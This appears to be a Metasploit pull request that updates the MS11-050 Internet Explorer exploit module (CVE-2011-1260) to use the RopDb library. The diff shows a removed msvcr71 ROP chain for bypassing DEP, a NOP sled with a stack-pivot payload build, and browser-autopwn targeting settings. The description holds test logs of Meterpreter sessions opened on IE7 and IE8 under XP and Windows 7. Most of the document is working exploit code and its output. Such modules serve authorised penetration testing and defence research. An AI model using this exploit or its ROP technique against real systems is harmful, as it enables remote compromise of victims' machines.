### PR TITLE
Use RopDb in MS11-050, and correct autopwninfo

### DIFF
--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -1,8 +1,4 @@
 ##
-# $Id$
-##
-
-##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
@@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
 	include Msf::Exploit::Remote::BrowserAutopwn
 	autopwn_info({
 		:ua_name    => HttpClients::IE,
 		:ua_minver  => "7.0",
 		:ua_maxver  => "8.0",
 		:javascript => true,
-		:os_name    => OperatingSystems::WINDOWS,
-		# If it's IE 8, then we need .net to bypass ASLR
-		:vuln_test  => %Q|
-			if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
-				if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
-			}
-		|,
+		:os_name    => OperatingSystems::WINDOWS
 	})
 
 	def initialize(info={})
@@ -46,30 +37,29 @@ class Metasploit3 < Msf::Exploit::Remote
 				to bypass DEP (Data Execution Prevention).
 			},
 			'License'        => MSF_LICENSE,
-			'Version'        => "$Revision$",
 			'Author'         =>
 				[
 					'd0c_s4vage',   #Discovery, poc
 					'sinn3r',       #ROP (thx corelanc0d3r), Windows 7
-					'bannedit',     #Windows 7
+					'bannedit'      #Windows 7
 				],
 			'References'     =>
 				[
 					['CVE', '2011-1260'],
 					['OSVDB', '72950'],
 					['MSB', 'MS11-050'],
-					['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
+					['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
 				],
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'process',
-					'InitialAutoRunScript' => 'migrate -f',
+					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Payload'        =>
 				{
 					'Space'    => 500,
 					'BadChars' => "\x00\x09\x0a\x0d'\\",
-					'StackAdjustment' => -3500,
+					'StackAdjustment' => -3500
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
@@ -185,42 +175,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		#In case we're using ROP, initialize it now
-		code = ''
-
 		if mytarget['Rop']
-			# !mona -m msvcr71 rop
-			code = [
-				0x7c376402,  # POP EBP # RETN [msvcr71.dll]
-				0x7c376402,  # skip 4 bytes [msvcr71.dll]
-				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-				0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
-				0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
-				0x7c354901,  # POP EBX # RETN [msvcr71.dll]
-				0xffffffff,
-				0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
-				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
-				0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
-				0xffffffc0,  # Value to negate, will become 0x00000040
-				0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
-				0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
-				0x7c38b001,  # &Writable location [msvcr71.dll]
-				0x7c34b8d7,  # POP EDI # RETN [msvcr71.dll]
-				0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
-				0x7c364802,  # POP ESI # RETN [msvcr71.dll]
-				0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
-				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
-				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
-				0x7c345c30,  # ptr to 'push esp #  ret ' [msvcr71.dll]
-			].pack("V*")
+			p  = make_nops(44)             #Nops
+			p << "\xeb\x04\xff\xff"        #Jmp over the pivot
+			p << [mytarget.ret].pack('V')  #Stack pivot
+			p << payload.encoded
 
-			code << "\x90"*20                 #Nops
-			code << "\xeb\x04\xff\xff"        #Jmp over the pivot
-			code << [mytarget.ret].pack('V')  #Stack pivot
+			rop_payload = generate_rop_payload('java', p)
 		end
 
-		code << payload.encoded
+		code = (rop_payload) ? rop_payload : payload.encoded
 
 		# fill the vtable
 		vtable = [mytarget['TargetAddr']].pack('V*')


### PR DESCRIPTION
Tested in IE7+Win XP, IE8+Win XP, IE8+Win7:

```
msf  exploit(ms11_050_mshtml_cobjectelement) > [*]  Local IP: http://10.0.1.3:8080/YgNLSNzn5qi3YO
[*] Server started.
[*] 10.0.1.6         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:1044) at 2012-10-06 01:39:09 -0500
[*] Session ID 3 (10.0.1.3:4444 -> 10.0.1.6:1044) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2872)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3188
[+] Successfully migrated to process


msf  exploit(ms11_050_mshtml_cobjectelement) > [*]  Local IP: http://10.0.1.3:8080/agNoigHh53i8Rzg
[*] Server started.
[*] 10.0.1.6         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on XP SP3)...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.6:1231) at 2012-10-06 01:17:53 -0500
[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.6:1231) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1676
[+] Successfully migrated to process


msf  exploit(ms11_050_mshtml_cobjectelement) >
[*] 10.0.1.7         ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 8 on Windows 7)...
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.7:49159) at 2012-10-06 01:44:05 -0500
[*] Session ID 4 (10.0.1.3:4444 -> 10.0.1.7:49159) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4064
[+] Successfully migrated to process
```
